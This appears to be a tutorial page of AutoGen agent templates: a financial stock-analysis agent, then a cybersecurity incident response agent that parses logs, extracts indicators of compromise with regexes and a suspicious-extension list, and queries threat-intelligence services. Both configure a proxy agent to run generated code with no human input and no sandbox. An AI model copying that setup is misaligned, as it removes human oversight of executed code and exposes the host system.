619 1. Technical Analysis - Key patterns, indicators, and potential price targets
620 2. Market Context - How the stock fits in the broader market environment
621 {"3. Fundamental Analysis - Company financial health and valuation" if include_fundamentals else ""}
622 {"4. News Sentiment Analysis - Impact of recent news" if include_news else ""}
623 5. Investment Recommendation - Clear buy/hold/sell guidance with time horizon
624 6. Risk Assessment - Key risks and considerations
625
626 The MarketAnalyst should begin by providing market context.
627 The TechnicalAnalyst should analyze price patterns and indicators.
628 The FundamentalAnalyst should assess the company's financial health and valuation.
629 The SentimentAnalyst should evaluate recent news and sentiment.
630 The PortfolioAdvisor should synthesize these analyses into investment recommendations.
631 Finally, the ReportWriter should compile a well-structured professional report.
632 """
633
634 # Start the group chat
635 result = self.user_proxy.initiate_chat(
636 manager,
637 message=analysis_prompt
638 )
639
640 # Extract the final report
641 final_report = None
642 for message in reversed(self.user_proxy.chat_history):
643 if message['role'] == 'assistant' and 'ReportWriter' in message.get('name', ''):
644 final_report = message['content']
645 break
646
647 if not final_report:
648 # Use the last substantial response if no clear report
649 for message in reversed(self.user_proxy.chat_history):
650 if message['role'] == 'assistant' and len(message['content']) > 500:
651 final_report = message['content']
652 break
653
654 return {
655 "symbol": symbol,
656 "analysis_date": datetime.datetime.now().strftime("%Y-%m-%d"),
657 "period": period,
658 "report_type": report_type,
659 "price_data": {
660 "current_price": price_end,
661 "price_change": price_change,
662 "price_change_pct": price_change_pct,
663 "period_high": price_high,
664 "period_low": price_low
665 },
666 "technical_indicators": tech_indicators,
667 "report": final_report
668 }
669 else:
670 return {"error": f"No data available for {symbol}"}
671
672 def compare_stocks(
673 self,
674 symbols: List[str],
675 period: str = "1y",
676 report_type: str = "standard"
677 ) -> Dict[str, Any]:
678 """
679 Compare multiple stocks and provide analysis.
680
681 Args:
682 symbols: List of stock symbols to compare
683 period: Time period for analysis
684 report_type: Type of report (standard, detailed, executive)
685
686 Returns:
687 Dictionary with comparative analysis
688 """
689 if len(symbols) < 2:
690 return {"error": "Please provide at least two symbols for comparison"}
691
692 # Gather data for all symbols
693 market_data = self.fetch_market_data(symbols, period)
694
695 # Create group chat for agent collaboration
696 groupchat = autogen.GroupChat(
697 agents=[
698 self.user_proxy,
699 self.market_analyst,
700 self.technical_analyst,
701 self.fundamental_analyst,
702 self.portfolio_advisor,
703 self.report_writer
704 ],
705 messages=[],
706 max_round=12
707 )
708
709 manager = autogen.GroupChatManager(groupchat=groupchat)
710
711 # Prepare comparative data
712 comparison_data = {}
713 price_performance = {}
714 missing_data = []
715
716 for symbol in symbols:
717 if symbol in market_data and not market_data[symbol].empty:
718 df = market_data[symbol]
719
720 # Calculate performance metrics
721 price_start = df['Close'].iloc[0]
722 price_end = df['Close'].iloc[-1]
723 price_change_pct = ((price_end / price_start) - 1) * 100
724
725 # Calculate volatility (standard deviation of returns)
726 volatility = df['Daily_Return'].std() * 100 # Multiply by 100 for percentage
727
728 # Calculate max drawdown
729 rolling_max = df['Close'].cummax()
730 drawdown = (df['Close'] / rolling_max - 1) * 100
731 max_drawdown = drawdown.min()
732
733 # Normalize price series (starting at 100)
734 normalized_price = (df['Close'] / df['Close'].iloc[0]) * 100
735
736 # Store metrics
737 price_performance[symbol] = {
738 "price_change_pct": price_change_pct,
739 "current_price": price_end,
740 "volatility": volatility,
741 "max_drawdown": max_drawdown,
742 "normalized_prices": normalized_price.tolist()
743 }
744
745 # Calculate key technical indicators
746 tech_indicators = self.calculate_technical_indicators(
747 symbol,
748 ["ma50", "rsi", "macd"],
749 period
750 )
751
752 # Add to comparison data
753 comparison_data[symbol] = {
754 "performance": price_performance[symbol],
755 "technical_indicators": tech_indicators
756 }
757 else:
758 missing_data.append(symbol)
759
760 # Generate comparative analysis prompt
761 if comparison_data:
762 # Sort symbols by performance
763 sorted_symbols = sorted(
764 comparison_data.keys(),
765 key=lambda x: comparison_data[x]["performance"]["price_change_pct"],
766 reverse=True
767 )
768
769 # Create performance table
770 performance_table = "Symbol | Price Change (%) | Volatility (%) | Max Drawdown (%)\n"
771 performance_table += "-------|------------------|----------------|----------------\n"
772
773 for symbol in sorted_symbols:
774 perf = comparison_data[symbol]["performance"]
775 performance_table += f"{symbol} | {perf['price_change_pct']:.2f}% | {perf['volatility']:.2f}% | {perf['max_drawdown']:.2f}%\n"
776
777 # Create comparative prompt
778 comparison_prompt = f"""
779 Please perform a comparative analysis of the following stocks: {', '.join(symbols)}
780
781 TIME PERIOD: {period}
782
783 PERFORMANCE COMPARISON:
784 {performance_table}
785
786 TECHNICAL INDICATORS SUMMARY:
787 """
788
789 # Add technical indicators
790 for symbol in sorted_symbols:
791 tech = comparison_data[symbol]["technical_indicators"]
792 comparison_prompt += f"\n{symbol} Indicators:\n"
793 comparison_prompt += json.dumps(tech, indent=2) + "\n"
794
795 if missing_data:
796 comparison_prompt += f"\nNOTE: Could not fetch data for these symbols: {', '.join(missing_data)}\n"
797
798 comparison_prompt += f"""
799 Please provide a {report_type} comparative analysis report that includes:
800
801 1. Performance Comparison - Compare the stocks' performance during the period
802 2. Relative Strength Analysis - Which stocks show relative strength and weakness
803 3. Correlation Analysis - How these stocks move in relation to each other
804 4. Technical Position - Compare the technical position of each stock
805 5. Ranked Recommendations - Rank the stocks from most to least favorable
806 6. Portfolio Considerations - How these stocks might work together in a portfolio
807
808 The MarketAnalyst should analyze the market context and relative performance.
809 The TechnicalAnalyst should compare technical positions.
810 The FundamentalAnalyst should provide comparative fundamental context if relevant.
811 The PortfolioAdvisor should rank the stocks and provide portfolio recommendations.
812 Finally, the ReportWriter should compile a well-structured comparative report.
813 """
814
815 # Start the group chat
816 result = self.user_proxy.initiate_chat(
817 manager,
818 message=comparison_prompt
819 )
820
821 # Extract the final report
822 final_report = None
823 for message in reversed(self.user_proxy.chat_history):
824 if message['role'] == 'assistant' and 'ReportWriter' in message.get('name', ''):
825 final_report = message['content']
826 break
827
828 if not final_report:
829 # Use the last substantial response if no clear report
830 for message in reversed(self.user_proxy.chat_history):
831 if message['role'] == 'assistant' and len(message['content']) > 500:
832 final_report = message['content']
833 break
834
835 return {
836 "symbols": symbols,
837 "analysis_date": datetime.datetime.now().strftime("%Y-%m-%d"),
838 "period": period,
839 "report_type": report_type,
840 "performance_comparison": {symbol: comparison_data[symbol]["performance"] for symbol in comparison_data},
841 "missing_data": missing_data,
842 "report": final_report
843 }
844 else:
845 return {"error": "Could not fetch data for any of the provided symbols"}
846
847# Example usage
848if __name__ == "__main__":
849 # Create the financial analyst agent
850 financial_analyst = FinancialAnalystAgent()
851
852 # Analyze a single stock
853 analysis = financial_analyst.analyze_stock(
854 symbol="MSFT",
855 period="1y",
856 include_news=True,
857 report_type="standard"
858 )
859
860 print("=== Single Stock Analysis ===")
861 print(f"Symbol: {analysis['symbol']}")
862 print(f"Current Price: ${analysis['price_data']['current_price']:.2f}")
863 print(f"Price Change: {analysis['price_data']['price_change_pct']:.2f}%")
864 print("\nReport Excerpt:")
865 print(analysis['report'][:500] + "...\n")
866
867 # Compare multiple stocks
868 comparison = financial_analyst.compare_stocks(
869 symbols=["AAPL", "MSFT", "GOOGL"],
870 period="6mo",
871 report_type="standard"
872 )
873
874 print("=== Stock Comparison ===")
875 print(f"Symbols: {comparison['symbols']}")
876 print("\nPerformance Comparison:")
877 for symbol, perf in comparison['performance_comparison'].items():
878 print(f"{symbol}: {perf['price_change_pct']:.2f}%")
879
880 print("\nReport Excerpt:")
881 print(comparison['report'][:500] + "...")

Usage Example:

python
1from financial_analyst_agent import FinancialAnalystAgent
2
3# Initialize agent
4analyst = FinancialAnalystAgent()
5
6# Analyze a stock
7report = analyst.analyze_stock(
8 symbol="TSLA",
9 period="1y",
10 include_news=True,
11 include_fundamentals=True,
12 report_type="detailed"
13)
14
15print(f"Analysis of {report['symbol']} completed.")
16print(f"Current price: ${report['price_data']['current_price']:.2f}")
17print(f"Price change: {report['price_data']['price_change_pct']:.2f}%")
18print("\nReport Highlights:")
19print(report['report'])
20
21# Compare multiple stocks
22comparison = analyst.compare_stocks(
23 symbols=["AAPL", "MSFT", "GOOGL", "AMZN", "META"],
24 period="6mo",
25 report_type="standard"
26)
27
28print("\nComparative Analysis:")
29print(comparison['report'])

This AI Financial Analyst agent template demonstrates key enterprise patterns:

  1. Agent Specialization: Different agents focus on specific analysis types (technical, fundamental, news)
  2. Data Pipeline Integration: The system integrates multiple external data sources
  3. Collaborative Analysis: Agents work together via a group chat to produce a comprehensive analysis
  4. Flexible Report Generation: Different report types for various user needs
  5. Caching Strategy: Data caching to improve performance and reduce redundant API calls

AI-Powered Cybersecurity Incident Response (Threat Detection & Remediation)

This AI agent template is designed to help cybersecurity teams detect, analyze, and respond to security incidents. It combines threat intelligence, log analysis, and remediation guidance to provide comprehensive cybersecurity incident response.

Core Capabilities:

  • Automated log analysis and threat detection
  • Incident classification and severity assessment
  • Threat intelligence correlation
  • Forensic investigation support
  • Guided remediation steps
  • Documentation generation for compliance

Architecture:

Cybersecurity Incident Response Agent Architecture

Implementation Example:

python
1# cybersecurity_incident_response_agent.py
2import os
3import json
4import datetime
5import ipaddress
6import hashlib
7import re
8import uuid
9import pandas as pd
10import numpy as np
11import autogen
12import requests
13from typing import Dict, List, Any, Optional, Union, Tuple
14
15# Configure API keys and settings
16OPENAI_API_KEY = os.environ.get("OPENAI_API_KEY", "your-api-key")
17VIRUSTOTAL_API_KEY = os.environ.get("VIRUSTOTAL_API_KEY", "your-api-key")
18ABUSEIPDB_API_KEY = os.environ.get("ABUSEIPDB_API_KEY", "your-api-key")
19
20# Initialize OpenAI client
21import openai
22client = openai.OpenAI(api_key=OPENAI_API_KEY)
23
24class CybersecurityIncidentResponseAgent:
25 """
26 An AI-powered cybersecurity incident response agent that helps detect,
27 analyze, and respond to security incidents.
28 """
29
30 def __init__(self, config=None):
31 """
32 Initialize the Cybersecurity Incident Response Agent.
33
34 Args:
35 config: Optional configuration dictionary
36 """
37 self.config = config or {}
38
39 # Set up agent configuration
40 self.llm_config = {
41 "config_list": [{"model": "gpt-4-turbo", "api_key": OPENAI_API_KEY}],
42 "temperature": 0.2,
43 "timeout": 120
44 }
45
46 # Create the agent team
47 self._create_agent_team()
48
49 # Threat intelligence cache
50 self.threat_intel_cache = {}
51
52 def _create_agent_team(self):
53 """Create the team of specialized agents for cybersecurity incident response."""
54
55 # 1. Threat Detector - Specialized in identifying threats from logs and data
56 self.threat_detector = autogen.AssistantAgent(
57 name="ThreatDetector",
58 system_message="""You are an expert threat detection analyst who specializes in identifying security threats
59 from logs, network traffic, and system data.
60
61 Your responsibilities:
62 1. Analyze raw logs and identify suspicious patterns or anomalies
63 2. Recognize indicators of compromise (IoCs) such as unusual IP addresses, file hashes, or user behaviors
64 3. Detect potential attack techniques and map them to the MITRE ATT&CK framework
65 4. Identify false positives and prioritize genuine security concerns
66 5. Alert on critical security issues with appropriate context
67
68 Be thorough and methodical in your analysis. Look for subtle patterns that might indicate sophisticated
69 attacks. Avoid jumping to conclusions without sufficient evidence. Always provide specific indicators
70 and explain why they are suspicious.""",
71 llm_config=self.llm_config
72 )
73
74 # 2. Forensic Investigator - Specialized in detailed investigation
75 self.forensic_investigator = autogen.AssistantAgent(
76 name="ForensicInvestigator",
77 system_message="""You are an expert digital forensic investigator who specializes in analyzing security
78 incidents to determine their scope, impact, and attribution.
79
80 Your responsibilities:
81 1. Analyze evidence thoroughly to reconstruct the incident timeline
82 2. Identify the attack vectors and methods used by threat actors
83 3. Determine the scope of compromise (affected systems, data, users)
84 4. Look for persistence mechanisms and backdoors
85 5. Gather indicators that can help with attribution
86
87 Be methodical and detail-oriented in your investigation. Document your findings clearly, including timestamps
88 and specific technical details. Distinguish between confirmed facts, strong evidence, and speculation.
89 Consider alternative explanations and test your hypotheses against the evidence.""",
90 llm_config=self.llm_config
91 )
92
93 # 3. Threat Intelligence Analyst - Specialized in external threat intelligence
94 self.threat_intel_analyst = autogen.AssistantAgent(
95 name="ThreatIntelAnalyst",
96 system_message="""You are an expert threat intelligence analyst who specializes in researching and
97 analyzing cyber threats, threat actors, and their tactics, techniques, and procedures (TTPs).
98
99 Your responsibilities:
100 1. Research indicators of compromise against threat intelligence sources
101 2. Identify known threat actors or malware associated with the incident
102 3. Provide context on the tactics, techniques, and procedures used
103 4. Assess the potential goals and motivation of the attackers
104 5. Determine if the attack is targeted or opportunistic
105
106 Provide relevant, actionable intelligence that helps understand the threat. Link findings to the
107 MITRE ATT&CK framework when possible. Distinguish between high and low-confidence assessments.
108 Consider the reliability of intelligence sources. Focus on information that is directly relevant
109 to the current incident.""",
110 llm_config=self.llm_config
111 )
112
113 # 4. Incident Responder - Specialized in containment and remediation
114 self.incident_responder = autogen.AssistantAgent(
115 name="IncidentResponder",
116 system_message="""You are an expert incident responder who specializes in containing security incidents,
117 removing threats, and restoring systems to normal operation.
118
119 Your responsibilities:
120 1. Provide immediate containment actions to limit the impact of the incident
121 2. Develop detailed remediation plans to remove the threat
122 3. Recommend recovery steps to restore affected systems
123 4. Suggest security improvements to prevent similar incidents
124 5. Prioritize actions based on risk and business impact
125
126 Your recommendations should be specific, actionable, and prioritized. Consider the potential impact
127 of response actions on business operations. Provide both immediate tactical responses and strategic
128 improvements. Always consider the order of operations to avoid alerting attackers or destroying evidence.
129 Tailor your response to the specific environment and incident details.""",
130 llm_config=self.llm_config
131 )
132
133 # 5. Documentation Specialist - Specialized in creating comprehensive incident documentation
134 self.documentation_specialist = autogen.AssistantAgent(
135 name="DocumentationSpecialist",
136 system_message="""You are an expert in creating comprehensive cybersecurity incident documentation
137 that is clear, thorough, and suitable for multiple audiences including technical teams, management,
138 and compliance requirements.
139
140 Your responsibilities:
141 1. Compile incident details into structured documentation
142 2. Create executive summaries for management and technical details for IT teams
143 3. Ensure documentation satisfies compliance and regulatory requirements
144 4. Include all relevant timeline information, affected systems, and remediation steps
145 5. Document lessons learned and recommended improvements
146
147 Create documentation that is well-organized, precise, and actionable. Use clear sections with
148 appropriate headers. Include all relevant technical details while making executive summaries
149 accessible to non-technical audiences. Ensure all claims are supported by evidence. Include
150 metadata such as incident IDs, dates, and classification.""",
151 llm_config=self.llm_config
152 )
153
154 # User proxy agent for orchestrating the workflow
155 self.user_proxy = autogen.UserProxyAgent(
156 name="SecurityAnalyst",
157 human_input_mode="NEVER",
158 code_execution_config={
159 "work_dir": "security_workspace",
160 "use_docker": False
161 },
162 system_message="""You are a security analyst coordinating the incident response process.
163 Your role is to gather data, distribute it to the specialized analysts, and compile their insights.
164 You can execute Python code to analyze security data and fetch threat intelligence."""
165 )
166
167 def _hash_file(self, file_path: str) -> str:
168 """
169 Compute SHA-256 hash of a file.
170
171 Args:
172 file_path: Path to the file
173
174 Returns:
175 SHA-256 hash as a hexadecimal string
176 """
177 try:
178 sha256_hash = hashlib.sha256()
179 with open(file_path, "rb") as f:
180 for byte_block in iter(lambda: f.read(4096), b""):
181 sha256_hash.update(byte_block)
182 return sha256_hash.hexdigest()
183 except Exception as e:
184 print(f"Error hashing file {file_path}: {e}")
185 return None
186
187 def parse_log_data(self, log_data: str, log_type: str = "generic") -> List[Dict[str, Any]]:
188 """
189 Parse raw log data into structured format based on log type.
190
191 Args:
192 log_data: Raw log data as string
193 log_type: Type of log (generic, windows, linux, firewall, web, etc.)
194
195 Returns:
196 List of dictionaries containing structured log entries
197 """
198 structured_logs = []
199
200 # Split log data into lines
201 log_lines = log_data.strip().split('\n')
202
203 if log_type.lower() == "windows_event":
204 # Parse Windows Event logs
205 current_event = {}
206 for line in log_lines:
207 line = line.strip()
208 if line.startswith("Log Name:"):
209 if current_event:
210 structured_logs.append(current_event)
211 current_event = {"Log Name": line.split("Log Name:")[1].strip()}
212 elif ":" in line and current_event:
213 key, value = line.split(":", 1)
214 current_event[key.strip()] = value.strip()
215
216 # Add the last event
217 if current_event:
218 structured_logs.append(current_event)
219
220 elif log_type.lower() == "syslog":
221 # Parse syslog format
222 for line in log_lines:
223 if not line.strip():
224 continue
225
226 try:
227 # Basic syslog pattern: <timestamp> <hostname> <process>[<pid>]: <message>
228 match = re.match(r"(\w+\s+\d+\s+\d+:\d+:\d+)\s+(\S+)\s+([^:]+):\s+(.*)", line)
229 if match:
230 timestamp, hostname, process, message = match.groups()
231 # Extract PID if present
232 pid_match = re.search(r"\[(\d+)\]", process)
233 pid = pid_match.group(1) if pid_match else None
234 process = re.sub(r"\[\d+\]", "", process).strip()
235
236 structured_logs.append({
237 "timestamp": timestamp,
238 "hostname": hostname,
239 "process": process,
240 "pid": pid,
241 "message": message,
242 "raw_log": line
243 })
244 else:
245 # If pattern doesn't match, store as raw log
246 structured_logs.append({"raw_log": line})
247 except Exception as e:
248 structured_logs.append({"raw_log": line, "parse_error": str(e)})
249
250 elif log_type.lower() == "apache" or log_type.lower() == "nginx":
251 # Parse common web server log format
252 for line in log_lines:
253 if not line.strip():
254 continue
255
256 try:
257 # Common Log Format: <ip> <identity> <user> [<time>] "<request>" <status> <size>
258 # Combined Log Format: adds "<referrer>" "<user_agent>"
259 pattern = r'(\S+) (\S+) (\S+) \[(.*?)\] "([^"]*)" (\d+) (\S+)(?: "([^"]*)" "([^"]*)")?'
260 match = re.match(pattern, line)
261
262 if match:
263 groups = match.groups()
264 log_entry = {
265 "ip": groups[0],
266 "identity": groups[1],
267 "user": groups[2],
268 "time": groups[3],
269 "request": groups[4],
270 "status": groups[5],
271 "size": groups[6],
272 "raw_log": line
273 }
274
275 # Add referrer and user_agent if available (Combined Log Format)
276 if len(groups) > 7:
277 log_entry["referrer"] = groups[7]
278 if len(groups) > 8:
279 log_entry["user_agent"] = groups[8]
280
281 structured_logs.append(log_entry)
282 else:
283 structured_logs.append({"raw_log": line})
284 except Exception as e:
285 structured_logs.append({"raw_log": line, "parse_error": str(e)})
286
287 elif log_type.lower() == "firewall":
288 # Parse basic firewall log format
289 for line in log_lines:
290 if not line.strip():
291 continue
292
293 try:
294 # Extract key-value pairs from firewall logs
295 # Example: timestamp=2023-04-12T12:34:56 action=BLOCK src=192.168.1.2 dst=10.0.0.1 proto=TCP
296 log_entry = {"raw_log": line}
297
298 # Extract key-value pairs
299 kvp_pattern = r'(\w+)=([^ ]+)'
300 for k, v in re.findall(kvp_pattern, line):
301 log_entry[k] = v
302
303 structured_logs.append(log_entry)
304 except Exception as e:
305 structured_logs.append({"raw_log": line, "parse_error": str(e)})
306
307 else:
308 # Generic log parsing - best effort
309 for line in log_lines:
310 if not line.strip():
311 continue
312
313 log_entry = {"raw_log": line}
314
315 # Try to extract timestamp
316 timestamp_pattern = r'\b\d{4}-\d{2}-\d{2}[T ]\d{2}:\d{2}:\d{2}(?:\.\d+)?(?:Z|[+-]\d{2}:\d{2})?\b'
317 timestamp_match = re.search(timestamp_pattern, line)
318 if timestamp_match:
319 log_entry["timestamp"] = timestamp_match.group(0)
320
321 # Try to extract IP addresses
322 ip_pattern = r'\b(?:\d{1,3}\.){3}\d{1,3}\b'
323 ip_addresses = re.findall(ip_pattern, line)
324 if ip_addresses:
325 log_entry["ip_addresses"] = ip_addresses
326
327 # Try to extract severity levels
328 severity_pattern = r'\b(ERROR|WARN(?:ING)?|INFO|DEBUG|CRITICAL|ALERT|EMERGENCY)\b'
329 severity_match = re.search(severity_pattern, line, re.IGNORECASE)
330 if severity_match:
331 log_entry["severity"] = severity_match.group(0)
332
333 structured_logs.append(log_entry)
334
335 return structured_logs
336
337 def extract_indicators(self, logs: List[Dict[str, Any]]) -> Dict[str, List[str]]:
338 """
339 Extract potential indicators of compromise from logs.
340
341 Args:
342 logs: Parsed log data
343
344 Returns:
345 Dictionary of indicators by type (ip, domain, hash, etc.)
346 """
347 indicators = {
348 "ips": set(),
349 "domains": set(),
350 "urls": set(),
351 "hashes": set(),
352 "usernames": set(),
353 "filenames": set()
354 }
355
356 for log in logs:
357 raw_log = log.get("raw_log", "")
358
359 # Extract IPs
360 # Also look in specific fields like src, dst, source_ip, etc.
361 ip_pattern = r'\b(?:\d{1,3}\.){3}\d{1,3}\b'
362 found_ips = re.findall(ip_pattern, raw_log)
363
364 for ip_field in ["ip", "src", "dst", "source_ip", "destination_ip", "client_ip"]:
365 if ip_field in log and log[ip_field]:
366 found_ips.append(log[ip_field])
367
368 for ip in found_ips:
369 try:
370 # Validate IP address format
371 ipaddress.ip_address(ip)
372 # Skip private and loopback addresses
373 ip_obj = ipaddress.ip_address(ip)
374 if not (ip_obj.is_private or ip_obj.is_loopback or ip_obj.is_multicast):
375 indicators["ips"].add(ip)
376 except:
377 pass
378
379 # Extract domains
380 domain_pattern = r'\b(?:[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?\.)+[a-zA-Z]{2,}\b'
381 found_domains = re.findall(domain_pattern, raw_log)
382
383 for domain in found_domains:
384 # Skip common benign domains
385 common_domains = ["google.com", "microsoft.com", "apple.com", "amazon.com"]
386 if not any(domain.endswith(d) for d in common_domains):
387 indicators["domains"].add(domain)
388
389 # Extract URLs
390 url_pattern = r'https?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
391 found_urls = re.findall(url_pattern, raw_log)
392 indicators["urls"].update(found_urls)
393
394 # Extract file hashes (MD5, SHA1, SHA256)
395 md5_pattern = r'\b[a-fA-F0-9]{32}\b'
396 sha1_pattern = r'\b[a-fA-F0-9]{40}\b'
397 sha256_pattern = r'\b[a-fA-F0-9]{64}\b'
398
399 indicators["hashes"].update(re.findall(md5_pattern, raw_log))
400 indicators["hashes"].update(re.findall(sha1_pattern, raw_log))
401 indicators["hashes"].update(re.findall(sha256_pattern, raw_log))
402
403 # Extract usernames - depends on log format
404 # This is a simple extraction for common formats, would need to be customized
405 if "user" in log and log["user"] and log["user"] != "-":
406 indicators["usernames"].add(log["user"])
407
408 # Look for username patterns in raw log
409 username_pattern = r'user[=:]([^\s;]+)'
410 username_matches = re.findall(username_pattern, raw_log, re.IGNORECASE)
411 indicators["usernames"].update(username_matches)
412
413 # Extract filenames with potential malicious extensions
414 malicious_extensions = [".exe", ".dll", ".ps1", ".vbs", ".bat", ".sh", ".js", ".hta"]
415 filename_pattern = r'\b[\w-]+(\.[\w-]+)+\b'
416 found_filenames = re.findall(filename_pattern, raw_log)
417
418 for filename in found_filenames:
419 _, ext = os.path.splitext(filename)
420 if ext.lower() in malicious_extensions:
421 indicators["filenames"].add(filename)
422
423 # Convert sets to lists for JSON serialization
424 return {k: list(v) for k, v in indicators.items()}
425
426 def check_indicator_reputation(self, indicator: str, indicator_type: str) -> Dict[str, Any]:
427 """
428 Check the reputation of an indicator using threat intelligence services.
429
430 Args:
431 indicator: The indicator value
432 indicator_type: Type of indicator (ip, domain, hash, url)
433
434 Returns:
435 Dictionary with reputation data
436 """
437 # Check cache first
438 cache_key = f"{indicator_type}:{indicator}"
439 if cache_key in self.threat_intel_cache:
440 return self.threat_intel_cache[cache_key]
441
442 reputation_data = {
443 "indicator": indicator,
444 "type": indicator_type,
445 "malicious": False,
446 "reputation_score": 0,
447 "tags": [],
448 "source": "Unknown",
449 "last_seen": None
450 }
451
452 try:
453 if indicator_type == "ip":
454 # Check IP reputation using AbuseIPDB
455 url = f"https://api.abuseipdb.com/api/v2/check"
456 headers = {
457 "Accept": "application/json",
458 "Key": ABUSEIPDB_API_KEY
459 }
460 params = {
461 "ipAddress": indicator,
462 "maxAgeInDays": 90,
463 "verbose": True
464 }
465
466 response = requests.get(url, headers=headers, params=params)
467 if response.status_code == 200:
468 data = response.json().get("data", {})
469 abuse_score = data.get("abuseConfidenceScore", 0)
470 domain = data.get("domain", "")
471
472 reputation_data.update({
473 "malicious": abuse_score > 50,
474 "reputation_score": abuse_score,
475 "tags": data.get("usageType", "").split(","),
476 "source": "AbuseIPDB",
477 "domain": domain,
478 "country": data.get("countryCode", ""),
479 "reports": data.get("totalReports", 0),
480 "last_seen": data.get("lastReportedAt", None)
481 })
482
483 elif indicator_type in ["hash", "file_hash"]:
484 # Check file hash reputation using VirusTotal
485 url = f"https://www.virustotal.com/api/v3/files/{indicator}"
486 headers = {
487 "x-apikey": VIRUSTOTAL_API_KEY
488 }
489
490 response = requests.get(url, headers=headers)
491 if response.status_code == 200:
492 data = response.json().get("data", {})
493 attributes = data.get("attributes", {})
494 stats = attributes.get("last_analysis_stats", {})
495
496 malicious_count = stats.get("malicious", 0)
497 suspicious_count = stats.get("suspicious", 0)
498 total_engines = sum(stats.values())
499
500 # Calculate reputation score (0-100)
501 if total_engines > 0:
502 reputation_score = ((malicious_count + suspicious_count) / total_engines) * 100
503 else:
504 reputation_score = 0
505
506 # Get tags from popular threat categories
507 tags = []
508 popular_threats = attributes.get("popular_threat_classification", {}).get("suggested_threat_label", "")
509 if popular_threats:
510 tags.append(popular_threats)
511
512 reputation_data.update({
513 "malicious": malicious_count > 0,
514 "reputation_score": reputation_score,
515 "tags": tags,
516 "source": "VirusTotal",
517 "detection_ratio": f"{malicious_count}/{total_engines}",
518 "file_type": attributes.get("type_description", "Unknown"),
519 "first_seen": attributes.get("first_submission_date", None),
520 "last_seen": attributes.get("last_analysis_date", None)
521 })
522
523 elif indicator_type in ["domain", "url"]:
524 # Check domain/URL reputation using VirusTotal
525 if indicator_type == "domain":
526 url = f"https://www.virustotal.com/api/v3/domains/{indicator}"
527 else:
528 # URL needs to be properly encoded for the API
529 encoded_url = indicator.replace("/", "%2F").replace(":", "%3A")
530 url = f"https://www.virustotal.com/api/v3/urls/{encoded_url}"
531
532 headers = {
533 "x-apikey": VIRUSTOTAL_API_KEY
534 }
535
536 response = requests.get(url, headers=headers)
537 if response.status_code == 200:
538 data = response.json().get("data", {})
539 attributes = data.get("attributes", {})
540 stats = attributes.get("last_analysis_stats", {})
541
542 malicious_count = stats.get("malicious", 0)
543 suspicious_count = stats.get("suspicious", 0)
544 total_engines = sum(stats.values())
545
546 # Calculate reputation score (0-100)
547 if total_engines > 0:
548 reputation_score = ((malicious_count + suspicious_count) / total_engines) * 100
549 else:
550 reputation_score = 0
551
552 # Get categories assigned by threat intelligence
553 categories = attributes.get("categories", {})
554 tags = list(set(categories.values()))
555
556 reputation_data.update({
557 "malicious": malicious_count > 0,
558 "reputation_score": reputation_score,
559 "tags": tags,
560 "source": "VirusTotal",
561 "detection_ratio": f"{malicious_count}/{total_engines}",
562 "last_seen": attributes.get("last_analysis_date", None)
563 })
564
565 except Exception as e:
566 reputation_data["error"] = str(e)
567
568 # Cache the result
569 self.threat_intel_cache[cache_key] = reputation_data
570
571 return reputation_data
572
573 def enrich_indicators(self, indicators: Dict[str, List[str]]) -> Dict[str, List[Dict[str, Any]]]:
574 """
575 Enrich indicators with threat intelligence data.
576
577 Args:
578 indicators: Dictionary of indicators by type
579
580 Returns:
581 Dictionary of enriched indicators by type
582 """
583 enriched = {}
584
585 for ind_type, ind_list in indicators.items():
586 enriched[ind_type] = []
587
588 # Map indicator types to check_indicator_reputation types
589 type_mapping = {
590 "ips": "ip",
591 "domains": "domain",
592 "urls": "url",
593 "hashes": "hash"
594 }
595
596 if ind_type in type_mapping:
597 for indicator in ind_list:
598 reputation = self.check_indicator_reputation(
599 indicator,
600 type_mapping[ind_type]
601 )
602 enriched[ind_type].append(reputation)
603 else:
604 # For types without reputation check, just add the raw indicators
605 enriched[ind_type] = [{"indicator": ind, "type": ind_type} for ind in ind_list]
606
607 return enriched
608
609 def identify_attack_techniques(self, logs: List[Dict[str, Any]], enriched_indicators: Dict[str, List[Dict[str, Any]]]) -> List[Dict[str, Any]]:
610 """
611 Identify potential MITRE ATT&CK techniques from logs and indicators.
612
613 Args:
614 logs: Parsed log data
615 enriched_indicators: Enriched indicators from threat intelligence
616
617 Returns:
618 List of identified attack techniques with evidence
619 """
620 # Use OpenAI to identify potential attack techniques
621 # Prepare the prompt with log examples and enriched indicators
622
623 # Select a sample of logs (to avoid token limits)
624 log_sample = logs[:20] if len(logs) > 20 else logs
625 log_sample_text = json.dumps(log_sample, indent=2)
626
627 # Prepare enriched indicators summary
628 indicators_summary = ""
629 malicious_indicators = []
630
631 for ind_type, ind_list in enriched_indicators.items():
632 # Filter to include only malicious indicators
633 malicious = [ind for ind in ind_list if ind.get("malicious", False)]
634 if malicious:
635 malicious_indicators.extend(malicious)
636 indicators_summary += f"\n{ind_type.upper()}:\n"
637 for ind in malicious[:5]: # Limit to 5 indicators per type
638 indicators_summary += f"- {ind['indicator']} (Score: {ind['reputation_score']}, Tags: {', '.join(ind['tags'])})\n"
639
640 if len(malicious) > 5:
641 indicators_summary += f" ... and {len(malicious) - 5} more\n"
642
643 # Prepare the prompt
644 prompt = f"""Analyze the following security logs and malicious indicators to identify potential MITRE ATT&CK techniques:
645
646LOG SAMPLE:
647{log_sample_text}
648
649MALICIOUS INDICATORS:
650{indicators_summary}
651
652Based on these logs and indicators, identify the most likely MITRE ATT&CK techniques being used.
653For each technique, provide:
6541. The technique ID and name
6552. Confidence level (high, medium, low)
6563. Specific evidence from the logs or indicators
6574. Explanation of why this technique matches the evidence
658
659Format the response as a JSON array of techniques.
660"""
661
662 try:
663 response = client.chat.completions.create(
664 model="gpt-4-turbo",
665 messages=[
666 {"role": "system", "content": "You are a cybersecurity expert specialized in mapping security incidents to the MITRE ATT&CK framework."},
667 {"role": "user", "content": prompt}
668 ],
669 temperature=0.2,
670 response_format={"type": "json_object"}
671 )
672
673 # Extract and parse the response
674 attack_techniques = json.loads(response.choices[0].message.content)
675
676 # If the response is wrapped in a container object, extract the techniques array
677 if "techniques" in attack_techniques:
678 attack_techniques = attack_techniques["techniques"]
679
680 return attack_techniques
681
682 except Exception as e:
683 print(f"Error identifying attack techniques: {e}")
684 return []
685
686 def assess_severity(
687 self,
688 attack_techniques: List[Dict[str, Any]],
